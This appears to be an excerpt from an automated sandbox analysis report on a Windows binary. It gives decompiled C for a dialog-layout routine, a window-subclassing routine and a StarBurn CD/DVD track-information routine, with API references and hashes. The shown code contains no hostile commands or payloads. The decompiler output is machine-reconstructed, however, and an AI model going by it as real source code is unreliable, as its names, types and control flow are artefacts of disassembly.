      					_t377 = _v40 * _t240 + (_t240 - 1) * _v48;
      				}
      				E0045D9FC(_v16, E0042CC24(_t465, _t377) + _v28 + _v28);
      				_t490 = _v52 + _v44 + _v36 + _v32 + _v32;
      				E0045DA2C(_v16, _v52 + _v44 + _v36 + _v32 + _v32);
      				_t419 = E00461FD4() >> 1;
      				if(_t490 < 0) {
      					asm("adc edx, 0x0");
      				}
      				_t256 =  *(_v16 + 0x48) >> 1;
      				if(_t490 < 0) {
      					asm("adc eax, 0x0");
      				}
      				_t491 = _t419 - _t256;
      				E00444098(_v16);
      				_t422 = E00461FC8() >> 1;
      				if(_t491 < 0) {
      					asm("adc edx, 0x0");
      				}
      				_t264 =  *(_v16 + 0x4c) >> 1;
      				if(_t491 < 0) {
      					asm("adc eax, 0x0");
      				}
      				E004440BC(_v16, _t422 - _t264);
      				if(_v9 == 4) {
      					_t267 =  *0x48f840; // 0x490b7c
      					E00464138( *_t267,  &_v108);
      					E00444958(_v16, _t377, _v108, _t465);
      				} else {
      					E00406A3C( *0x0048EB28, _t384,  &_v104);
      					E00444958(_v16, _t377, _v104, _t465);
      				}
      				_t493 = _v68;
      				if(_v68 != 0) {
      					_t459 = E0043A4F0(1);
      					 *((intOrPtr*)( *_t459 + 0x18))();
      					 *((intOrPtr*)( *_t459 + 0x68))();
      					_push(LoadIconA(0, _v68));
      					_t339 = E00428A00( *((intOrPtr*)(_t459 + 0x168)));
      					_pop(_t448);
      					E0042C580(_t339, _t448);
      					 *((intOrPtr*)( *_t459 + 0x84))(0x20, 0x20);
      				}
      				_t458 = E00434E40(_v16, 1);
      				 *((intOrPtr*)(_v16 + 0x2f8)) = _t458;
      				 *((intOrPtr*)( *_t458 + 0x18))();
      				 *((intOrPtr*)( *_t458 + 0x68))();
      				E00435318(_t458, 1);
      				E00444958(_t458, _t377, _v8, _t465);
      				E004442E8(_t458,  &_v96);
      				 *((intOrPtr*)( *_t458 + 0x70))();
      				_v60 = _t465 - _v96.right + _v28;
      				if(E00403DF8(_t458, _t493) != 0) {
      					_v60 = E0044432C(_v16) - _v60 -  *((intOrPtr*)(_t458 + 0x48));
      				}
      				 *((intOrPtr*)( *_t458 + 0x84))(_v96.bottom, _v96.right);
      				if((_v11 & 0x00000004) == 0) {
      					__eflags = _v11 & 0x00000001;
      					if((_v11 & 0x00000001) == 0) {
      						_v61 = 5;
      					} else {
      						_v61 = 0;
      					}
      				} else {
      					_v61 = 2;
      				}
      				if((_v11 & 0x00000008) == 0) {
      					__eflags = _v11 & 0x00000002;
      					if((_v11 & 0x00000002) == 0) {
      						_v62 = 2;
      					} else {
      						_v62 = 1;
      					}
      				} else {
      					_v62 = 3;
      				}
      				_t296 = E0044432C(_v16) - _t377;
      				_t297 = _t296 >> 1;
      				if(_t296 < 0) {
      					asm("adc eax, 0x0");
      				}
      				_v56 = _t297;
      				_t378 = 0;
      				_v76 = 0x48eb50;
      				_t470 = 0x48eb7c;
      				_v80 = 0x48eba8;
      				do {
      					_t500 = _t378 - 0xf;
      					if(_t500 <= 0) {
      						asm("bt [ebp-0x7], eax");
      					}
      					if(_t500 < 0) {
      						_v72 = E00438748(_v16, 1, _t458, _t506);
      						 *((intOrPtr*)( *_v72 + 0x18))();
      						 *((intOrPtr*)( *_v72 + 0x68))();
      						E00406A3C( *_t470,  *_v72,  &_v112);
      						E00444958(_v72, _t378, _v112, _t470);
      						 *((intOrPtr*)(_v72 + 0x214)) =  *_v80;
      						_t501 = _t378 - _v61;
      						if(_t378 == _v61) {
      							E00438828(_v72, 1, _t501);
      						}
      						if(_t378 == _v62) {
      							 *((char*)(_v72 + 0x211)) = 1;
      						}
      						_t458 =  *_v72;
      						 *((intOrPtr*)( *_v72 + 0x84))(_v44, _v40);
      						_v56 = _v56 + _v40 + _v48;
      						if(_t378 == 0xa) {
      							_t321 = _v72;
      							 *((intOrPtr*)(_t321 + 0x124)) = _v16;
      							 *((intOrPtr*)(_t321 + 0x120)) = 0x43d2a8;
      						}
      					}
      					_t378 = _t378 + 1;
      					_v80 = _v80 + 4;
      					_t470 = _t470 + 4;
      					_v76 = _v76 + 4;
      				} while (_t378 != 0xb);
      				_pop(_t441);
      				 *[fs:eax] = _t441;
      				_push(0x43dc82);
      				return E00404A64( &_v112, 4);
      			}

      APIs
        • Part of subcall function 0043D230: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0043D26D
        • Part of subcall function 0043D230: CreateFontIndirectA.GDI32(?), ref: 0043D27A
        • Part of subcall function 0043D064: GetTextExtentPointA.GDI32(00000000,00000034,00000034,?), ref: 0043D09F
      • MulDiv.KERNEL32(00000008,?,00000004), ref: 0043D7B9
      • MulDiv.KERNEL32(00000008,?,00000008), ref: 0043D7C9
      • MulDiv.KERNEL32(0000000A,?,00000004), ref: 0043D7D6
      • MulDiv.KERNEL32(0000000A,?,00000008), ref: 0043D7E2
      • MulDiv.KERNEL32(00000032,?,00000004), ref: 0043D7EF
      • DrawTextA.USER32(00000000,00000000,000000FF,?,00000000), ref: 0043D862
      • MulDiv.KERNEL32(0000000E,?,00000008), ref: 0043D895
      • MulDiv.KERNEL32(00000004,?,00000004), ref: 0043D8A5
      • SetRect.USER32 ref: 0043D8CB
      • DrawTextA.USER32(00000000,00000000,00000001,?,00000000), ref: 0043D903
      • LoadIconA.USER32(00000000,00000000), ref: 0043DA63
        • Part of subcall function 00464138: GetWindowTextA.USER32 ref: 0046415B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Text$Draw$CreateExtentFontIconIndirectInfoLoadParametersPointRectSystemWindow
      • String ID: $H>C$Image$Message$PH
      • API String ID: 4220236395-1574829860
      • Opcode ID: 59bc8712a043cca482d1eaa4f5823f5e7f1a5328afa06a34fb6279799cb0cf52
      • Instruction ID: 5145ca98db5378cdaef32ba7da3508233253f49cb8f783695730ee707ff58968
      • Opcode Fuzzy Hash: 59bc8712a043cca482d1eaa4f5823f5e7f1a5328afa06a34fb6279799cb0cf52
      • Instruction Fuzzy Hash: 82024C75E002089FDB00EFA9D885B9DB7F5FF49308F14816AE914AB352C778AD05CB59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 83%
      			E0047AED0(intOrPtr __eax, void* __ebx, void* __esi, void* __eflags) {
      				intOrPtr _v8;
      				char _v12;
      				char* _t106;
      				intOrPtr _t118;
      				intOrPtr _t119;
      				intOrPtr* _t133;
      				long _t140;
      				intOrPtr _t166;
      				struct HWND__* _t195;
      				long _t196;
      				void* _t198;
      				void* _t199;
      				struct HWND__* _t200;
      				void* _t201;
      				intOrPtr _t212;
      				intOrPtr _t214;
      				intOrPtr _t218;
      				struct HWND__* _t224;
      				void* _t225;
      				struct HWND__* _t226;
      				struct HWND__* _t227;
      				void* _t229;
      				void* _t230;
      				intOrPtr _t231;
      
      				_t229 = _t230;
      				_t231 = _t230 + 0xfffffff8;
      				_v12 = 0;
      				_v8 = __eax;
      				_push(_t229);
      				_push(0x47b1e3);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t231;
      				E00437414(_v8);
      				_t195 = GetWindow(E0044B158(_v8), 5);
      				 *(_v8 + 0x248) = _t195;
      				_t224 = _t195;
      				 *(_v8 + 0x270) = _t224;
      				 *((intOrPtr*)(_v8 + 0x274)) = GetWindowLongA(_t224, 0xfffffffc);
      				SetWindowLongA( *(_v8 + 0x270), 0xfffffffc,  *(_v8 + 0x278));
      				if( *((intOrPtr*)(_v8 + 0x289)) - 2 < 0) {
      					_t200 = GetWindow(GetWindow(E0044B158(_v8), 5), 5);
      					if(_t200 != 0) {
      						if( *((char*)(_v8 + 0x289)) == 1) {
      							_t227 = _t200;
      							 *(_v8 + 0x244) = _t227;
      							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t227, 0xfffffffc);
      							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
      							_t200 = GetWindow(_t200, 2);
      						}
      						_t226 = _t200;
      						 *(_v8 + 0x240) = _t226;
      						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t226, 0xfffffffc);
      						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
      					}
      				}
      				_t106 =  *0x48f73c; // 0x490ae0
      				if( *_t106 != 0 &&  *(_v8 + 0x240) != 0) {
      					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
      				}
      				if( *((intOrPtr*)(_v8 + 0x284)) == 0) {
      					__eflags =  *((intOrPtr*)(_v8 + 0x280));
      					if(__eflags != 0) {
      						_t140 = E00451B70( *((intOrPtr*)(_v8 + 0x280)));
      						PostMessageA(E0044B158(_v8), 0x402, 0, _t140);
      					}
      					E0047B21C(_v8, _t201,  *((intOrPtr*)(_v8 + 0x28a)), __eflags);
      					E00406578(_v8 + 0x268);
      					_push(E00406578(_v8 + 0x268));
      					_push(0x47b1f0);
      					_push(1);
      					_push(0);
      					_t118 =  *0x48f560; // 0x48e924
      					_push(_t118);
      					L00416C3C();
      					_t119 = _v8;
      					__eflags =  *((intOrPtr*)(_t119 + 0x268));
      					if( *((intOrPtr*)(_t119 + 0x268)) != 0) {
      						_t196 = SendMessageA(E0044B158(_v8), 0x407, 0, 0);
      						__eflags = _t196;
      						if(_t196 != 0) {
      							_t214 = E0047BA8C( *((intOrPtr*)(_v8 + 0x28c)), 1);
      							__eflags = _t214;
      							if(_t214 != 0) {
      								__eflags = _t214;
      							}
      							E00406590( &_v12, _t214);
      							_t133 =  *((intOrPtr*)(_v8 + 0x268));
      							 *((intOrPtr*)( *_t133 + 0xc))(_t133, _t196, _v12, 0, 0);
      							E0047B3B0(_v8, _t196, __eflags);
      						}
      					}
      					__eflags = 0;
      					_pop(_t212);
      					 *[fs:eax] = _t212;
      					_push(0x47b1ea);
      					return E00406578( &_v12);
      				} else {
      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x20))();
      					 *((char*)(_v8 + 0x288)) = 1;
      					 *[fs:eax] = _t231;
      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 8))( *[fs:eax], 0x47b0e7, _t229);
      					_t198 = E0041A9F0( *((intOrPtr*)(_v8 + 0x28c))) - 1;
      					if(_t198 >= 0) {
      						_t199 = _t198 + 1;
      						_t225 = 0;
      						do {
      							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x2c))();
      							_t225 = _t225 + 1;
      							_t199 = _t199 - 1;
      						} while (_t199 != 0);
      					}
      					E0040E7F0(_v8 + 0x284);
      					E00444A1C(_v8);
      					_pop(_t218);
      					 *[fs:eax] = _t218;
      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28c)))) + 0x24))(0x47b0ee);
      					_t166 = _v8;
      					 *((char*)(_t166 + 0x288)) = 0;
      					return _t166;
      				}
      			}

      APIs
        • Part of subcall function 00437414: SendMessageA.USER32 ref: 00437434
      • GetWindow.USER32(00000000,00000005), ref: 0047AF01
      • GetWindowLongA.USER32 ref: 0047AF1F
      • SetWindowLongA.USER32 ref: 0047AF43
      • GetWindow.USER32(00000000,00000005), ref: 0047AF66
      • GetWindow.USER32(00000000,00000000), ref: 0047AF6C
      • GetWindowLongA.USER32 ref: 0047AF95
      • SetWindowLongA.USER32 ref: 0047AFB9
      • GetWindow.USER32(00000000,00000002), ref: 0047AFC1
      • GetWindowLongA.USER32 ref: 0047AFD6
      • SetWindowLongA.USER32 ref: 0047AFFA
      • SendMessageA.USER32 ref: 0047B028
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Long$MessageSend
      • String ID: $H$I
      • API String ID: 1593136606-2099304830
      • Opcode ID: bcf13a1ae3382ab1771d33baf1555ec2df65b1ac381bff32b6cd555f344e0498
      • Instruction ID: bace3c43233f04fd3bf2143661fb30d7aebbb9edc71341416dae43d948594c51
      • Opcode Fuzzy Hash: bcf13a1ae3382ab1771d33baf1555ec2df65b1ac381bff32b6cd555f344e0498
      • Instruction Fuzzy Hash: 37A1EC74A04104EFD710EBA9C989F9E77F5EB08304F2581B5F508AB3A2CB74AE44DB58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 78%
      			E00487544(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, long long __fp0) {
      				intOrPtr _v8;
      				char _v12;
      				char _v16;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				intOrPtr _v33;
      				intOrPtr _v35;
      				void* _v43;
      				void _v44;
      				char _v13870;
      				void* _v13872;
      				char _v13882;
      				char _v13888;
      				char _v13892;
      				intOrPtr _v13896;
      				char _v13900;
      				intOrPtr _v13904;
      				char _v13908;
      				char _v13912;
      				char _v13916;
      				char _v13920;
      				intOrPtr _v13924;
      				char _v13928;
      				intOrPtr _v13932;
      				char _v13936;
      				intOrPtr _v13940;
      				char _v13944;
      				intOrPtr _v13948;
      				char _v13952;
      				char _v13956;
      				char _v13960;
      				char _v13964;
      				char _v13968;
      				char _v13972;
      				char _v13976;
      				char _v13980;
      				char _v13984;
      				char _v13988;
      				char _v13992;
      				char _v13996;
      				intOrPtr _v14000;
      				char _v14004;
      				intOrPtr _v14008;
      				char _v14012;
      				intOrPtr _v14016;
      				char _v14020;
      				intOrPtr _v14024;
      				char _v14028;
      				intOrPtr _v14032;
      				char _v14036;
      				intOrPtr _v14040;
      				char _v14044;
      				intOrPtr _v14048;
      				char _v14052;
      				char _v14056;
      				char _v14060;
      				char _v14064;
      				intOrPtr _v14068;
      				char _v14072;
      				intOrPtr _v14076;
      				char _v14080;
      				intOrPtr _v14084;
      				char _v14088;
      				char _v14092;
      				char _v14096;
      				char _v14100;
      				char _v14104;
      				char _v14108;
      				char _v14112;
      				char _v14116;
      				char _v14120;
      				char _v14124;
      				char _v14128;
      				intOrPtr* _t221;
      				char _t228;
      				intOrPtr* _t242;
      				char _t250;
      				intOrPtr _t251;
      				intOrPtr* _t263;
      				intOrPtr* _t285;
      				intOrPtr* _t305;
      				intOrPtr* _t322;
      				intOrPtr* _t335;
      				intOrPtr* _t388;
      				intOrPtr _t394;
      				void* _t395;
      				void* _t396;
      				intOrPtr _t433;
      				char _t465;
      				intOrPtr _t467;
      				void* _t479;
      				void* _t483;
      				void* _t488;
      				void* _t490;
      				intOrPtr _t493;
      				intOrPtr _t494;
      				long long _t512;
      
      				_t512 = __fp0;
      				_t478 = __edi;
      				_t493 = _t494;
      				_t396 = 0x6e5;
      				do {
      					_push(0);
      					_push(0);
      					_t396 = _t396 - 1;
      				} while (_t396 != 0);
      				_push(_t396);
      				_push(__ebx);
      				_push(__edi);
      				_t488 = __edx;
      				_v8 = __eax;
      				_push(_t493);
      				_push(0x487c55);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t494;
      				E0041A94C(_v8);
      				_push(1);
      				L00465EFC();
      				_t221 =  *0x48f538; // 0x490c50
      				E0047FD7C( *_t221, __ebx, 0, "CdvdBurnerGrabber_GetTOCInformation", __edi, _t488, __fp0);
      				_push( &_v13882);
      				_push(_t488 + 0x4e8);
      				_push(_t488 + 0xe4);
      				_push(0x400);
      				_push(_t488 + 0xe8);
      				_t228 =  *((intOrPtr*)(_t488 + 0xd8));
      				_push(_t228);
      				L00465EAC();
      				 *((char*)(_t488 + 0xe0)) = _t228;
      				_t394 =  *((intOrPtr*)(_t488 + 0xe0));
      				if(_t394 != 0 && _t394 != 8) {
      					_v13912 = 0;
      					_v13908 = 0;
      					_v13904 =  *((intOrPtr*)(_t488 + 0xe4));
      					_v13900 = 0;
      					_v13896 = _t488 + 0xe8;
      					_v13892 = 6;
      					E0040A164("StarBurn_CdvdBurnerGrabber_GetTOCInformation() failed, exception %d, status %d, text \"%s\"", 2,  &_v13912,  &_v13888);
      					E00404A94(_t488 + 4, _v13888);
      					_t388 =  *0x48f538; // 0x490c50
      					E0047FD7C( *_t388, _t394, 0,  *((intOrPtr*)(_t488 + 4)), __edi, _t488, __fp0);
      					E0040CBEC( *((intOrPtr*)(_t488 + 4)), 1);
      					E004043D0();
      				}
      				if( *((char*)(_t488 + 0xe0)) == 0 && 0 > 0) {
      					_v16 = 0;
      					_v12 = 1;
      					_t395 =  &_v13870;
      					do {
      						if(0 != _v12) {
      							goto L11;
      						} else {
      							_t251 =  *((intOrPtr*)(_t488 + 0x71));
      							if(_t251 != 0xd && _t251 != 5) {
      								goto L11;
      							}
      						}
      						goto L18;
      						L11:
      						_t242 =  *0x48f538; // 0x490c50
      						E0047FD7C( *_t242, _t395, 0, "CdvdBurnerGrabber_GetTrackInformation", _t478, _t488, _t512);
      						_push( &_v44);
      						_push(_v12);
      						_push(_t488 + 0x4e8);
      						_push(_t488 + 0xe4);
      						_push(0x400);
      						_push(_t488 + 0xe8);
      						_t250 =  *((intOrPtr*)(_t488 + 0xd8));
      						_push(_t250);
      						L00465E9C();
      						 *((char*)(_t488 + 0xe0)) = _t250;
      						if( *((char*)(_t488 + 0xe0)) == 0) {
      							if(_v44 != 0) {
      								_t479 = E0047F864(_v8);
      								memcpy(_t479 + 0xc,  &_v44, 7 << 2);
      								_t483 = _t479;
      								_t490 = _t488;
      								memcpy(_t483 + 0x28, _t395, 8 << 2);
      								_t494 = _t494 + 0x18;
      								asm("movsw");
      								_t478 = _t483;
      								_t488 = _t490;
      								E004662CC(_v35,  &_v13960, 1);
      								_v13956 = _v13960;
      								_v13952 = 0xb;
      								E004662CC(_v33,  &_v13964, 1);
      								_v13948 = _v13964;
      								_v13944 = 0xb;
      								_v13940 = _v24;
      								_v13936 = 0;
      								_v13932 = _v28;
      								_v13928 = 0;
      								_v13924 = 0;
      								_v13920 = 0;
      								E0040A164("Track Blank: %s, NWA valid: %s, free LBs %d, NWA %d, track number %d", 4,  &_v13956,  &_v13916);
      								_t465 = _v13916;
      								E00404A94(_t488 + 4, _t465);
      								asm("cdq");
      								 *((intOrPtr*)(_t478 + 0x58)) =  *((intOrPtr*)(_t478 + 0x32)) -  *((intOrPtr*)(_t478 + 0x2b));
      								 *((intOrPtr*)(_t478 + 0x5c)) = _t465;
      								_t467 =  *((intOrPtr*)(_t478 + 0x5c));
      								 *((intOrPtr*)(_t478 + 0x60)) = E00405938( *((intOrPtr*)(_t478 + 0x58)), _t467,  *((intOrPtr*)(_t478 + 0x42)), 0);
      								 *((intOrPtr*)(_t478 + 0x64)) = _t467;
      								if( *((char*)(_t478 + 0x3e)) != 0) {
      									E0047C474( *((intOrPtr*)(_t478 + 0x60)), _t512);
      									 *((long long*)(_t478 + 0x68)) = _t512;
      									asm("wait");
      								}
      								_push("Size: ");
      								E00466310(0,  &_v13968, _t512,  *((intOrPtr*)(_t478 + 0x60)),  *((intOrPtr*)(_t478 + 0x64)));
      								_push(_v13968);
      								_push(0x487d8c);
      								E004662CC(_v35,  &_v13976, 1);
      								_v13912 = _v13976;
      								_v13908 = 0xb;
      								_v13904 = _v24;
      								_v13900 = 0;
      								_v13896 = 0;
      								_v13892 = 0;
      								E0040A164("Track Blank: %s, free LBs %d, track number %d", 2,  &_v13912,  &_v13972);
      								_push(_v13972);
      								E00404DC0();
      								_push("Size: ");
      								E00466310(0,  &_v13980, _t512,  *((intOrPtr*)(_t478 + 0x60)),  *((intOrPtr*)(_t478 + 0x64)));
      								_push(_v13980);
      								_push(0x487d8c);
      								_push( *((intOrPtr*)(_t488 + 4)));
      								E00404DC0();
      							}
      							_v13912 = _v12;
      							_v13908 = 0;
      							_v13904 = 0;
      							_v13900 = 0;
      							E004662CC( *_t395,  &_v13988, 1);
      							_v13896 = _v13988;
      							_v13892 = 0xb;
      							E0040A164("TOC Index %d, Track Number: 0x%02X, Entry Valid: %s", 2,  &_v13912,  &_v13984);
      							E00404A94(_t488 + 4, _v13984);
      							_t263 =  *0x48f538; // 0x490c50
      							E0047FD7C( *_t263, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
      							_v14056 =  *((intOrPtr*)(_t395 + 3));
      							_v14052 = 0;
      							_v14048 = 0;
      							_v14044 = 0;
      							_v14040 = 0;
      							_v14036 = 0;
      							_v14032 = 0;
      							_v14028 = 0;
      							_v14024 =  *((intOrPtr*)(_t395 + 0xa));
      							_v14020 = 0;
      							_v14016 = 0;
      							_v14012 = 0;
      							_v14008 = 0;
      							_v14004 = 0;
      							_v14000 = 0;
      							_v13996 = 0;
      							E0040A164("Starting LBA %d, Starting MSF %d:%d:%d, Ending LBA %d, Ending MSF %d:%d:%d", 7,  &_v14056,  &_v13992);
      							E00404A94(_t488 + 4, _v13992);
      							_t285 =  *0x48f538; // 0x490c50
      							E0047FD7C( *_t285, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
      							E004662CC( *((intOrPtr*)(_t395 + 0x11)),  &_v14096, 1);
      							_v14092 = _v14096;
      							_v14088 = 0xb;
      							E004662CC( *((intOrPtr*)(_t395 + 0x12)),  &_v14100, 1);
      							_v14084 = _v14100;
      							_v14080 = 0xb;
      							E004662CC( *((intOrPtr*)(_t395 + 0x13)),  &_v14104, 1);
      							_v14076 = _v14104;
      							_v14072 = 0xb;
      							E004662CC( *((intOrPtr*)(_t395 + 0x14)),  &_v14108, 1);
      							_v14068 = _v14108;
      							_v14064 = 0xb;
      							E0040A164("MCN Available: %s, ISRC Available: %s, Four Channels Audio: %s, Pre-Emphasis Audio: %s", 3,  &_v14092,  &_v14060);
      							E00404A94(_t488 + 4, _v14060);
      							_t305 =  *0x48f538; // 0x490c50
      							E0047FD7C( *_t305, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
      							E004662CC( *((intOrPtr*)(_t395 + 0x15)),  &_v14116, 1);
      							_v13912 = _v14116;
      							_v13908 = 0xb;
      							E004662CC( *((intOrPtr*)(_t395 + 0x16)),  &_v14120, 1);
      							_v13904 = _v14120;
      							_v13900 = 0xb;
      							E004662CC( *((intOrPtr*)(_t395 + 0x17)),  &_v14124, 1);
      							_v13896 = _v14124;
      							_v13892 = 0xb;
      							E0040A164("Data: %s, Audio: %s, Digital Copy Prohibited: %s", 2,  &_v13912,  &_v14112);
      							E00404A94(_t488 + 4, _v14112);
      							_t322 =  *0x48f538; // 0x490c50
      							E0047FD7C( *_t322, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
      							_v13912 = 0;
      							_v13908 = 0;
      							_v13904 = 0;
      							_v13900 = 0;
      							_v13896 =  *((intOrPtr*)(_t395 + 0x1a));
      							_v13892 = 0;
      							E0040A164("Track Mode: 0x%02X, MODE2 Form: 0x%02X (if Track Mode = 0x02), LB (logical block) Size In UCHARs: %d", 2,  &_v13912,  &_v14128);
      							E00404A94(_t488 + 4, _v14128);
      							_t335 =  *0x48f538; // 0x490c50
      							E0047FD7C( *_t335, _t395, 0,  *((intOrPtr*)(_t488 + 4)), _t478, _t488, _t512);
      						}
      						_v12 = _v12 + 1;
      						_t395 = _t395 + 0x22;
      						_t210 =  &_v16;
      						 *_t210 = _v16 - 1;
      					} while ( *_t210 != 0);
      				}
      				L18:
      				_pop(_t433);
      				 *[fs:eax] = _t433;
      				_push(0x487c5c);
      				E00404A64( &_v14128, 9);
      				E00404A40( &_v14060);
      				E00404A64( &_v13992, 9);
      				E00404A40( &_v13916);
      				return E00404A40( &_v13888);
      			}

      APIs
      • StarBurn_SetFastReadTOC.STARBURN(00000001,00000000,00487C55,?,?,?,?,000006E4,00000000,00000000), ref: 00487574
      • StarBurn_CdvdBurnerGrabber_GetTOCInformation.STARBURN(?,?,00000400,?,?,?,00000001,00000000,00487C55,?,?,?,?,000006E4,00000000,00000000), ref: 004875B4
      • StarBurn_CdvdBurnerGrabber_GetTrackInformation.STARBURN(?,?,00000400,?,?,00000001,?), ref: 004876E5
      Strings
      • CdvdBurnerGrabber_GetTrackInformation, xrefs: 004876B2
      • Track Blank: %s, NWA valid: %s, free LBs %d, NWA %d, track number %d, xrefs: 004877BE
      • StarBurn_CdvdBurnerGrabber_GetTOCInformation() failed, exception %d, status %d, text "%s", xrefs: 0048761F
      • Track Mode: 0x%02X, MODE2 Form: 0x%02X (if Track Mode = 0x02), LB (logical block) Size In UCHARs: %d, xrefs: 00487BCE
      • Track Blank: %s, free LBs %d, track number %d, xrefs: 00487887
      • CdvdBurnerGrabber_GetTOCInformation, xrefs: 00487582
      • MCN Available: %s, ISRC Available: %s, Four Channels Audio: %s, Pre-Emphasis Audio: %s, xrefs: 00487ABB
      • TOC Index %d, Track Number: 0x%02X, Entry Valid: %s, xrefs: 0048792D
      • Size: , xrefs: 0048780D, 004878A4
      • Starting LBA %d, Starting MSF %d:%d:%d, Ending LBA %d, Ending MSF %d:%d:%d, xrefs: 004879F4
      • Data: %s, Audio: %s, Digital Copy Prohibited: %s, xrefs: 00487B5F
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_Star$BurnerCdvdGrabber_Information$FastReadTrack
      • String ID: CdvdBurnerGrabber_GetTOCInformation$CdvdBurnerGrabber_GetTrackInformation$Data: %s, Audio: %s, Digital Copy Prohibited: %s$MCN Available: %s, ISRC Available: %s, Four Channels Audio: %s, Pre-Emphasis Audio: %s$Size: $StarBurn_CdvdBurnerGrabber_GetTOCInformation() failed, exception %d, status %d, text "%s"$Starting LBA %d, Starting MSF %d:%d:%d, Ending LBA %d, Ending MSF %d:%d:%d$TOC Index %d, Track Number: 0x%02X, Entry Valid: %s$Track Blank: %s, NWA valid: %s, free LBs %d, NWA %d, track number %d$Track Blank: %s, free LBs %d, track number %d$Track Mode: 0x%02X, MODE2 Form: 0x%02X (if Track Mode = 0x02), LB (logical block) Size In UCHARs: %d
      • API String ID: 2997071313-3986390700
      • Opcode ID: d24b323e39459afcb694a08f94bebebe0ec4b502679d36defbc307e375f31337
      • Instruction ID: 7d3ada6bbe1e602b598d1d7f8964f07f9e524a69f2f2659685a46a737e53711d
      • Opcode Fuzzy Hash: d24b323e39459afcb694a08f94bebebe0ec4b502679d36defbc307e375f31337
      • Instruction Fuzzy Hash: C6123FB4904698AECB22DF29C8917DABBF8AF09304F0485EAD44DE7341D735AB84CF55
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 68%
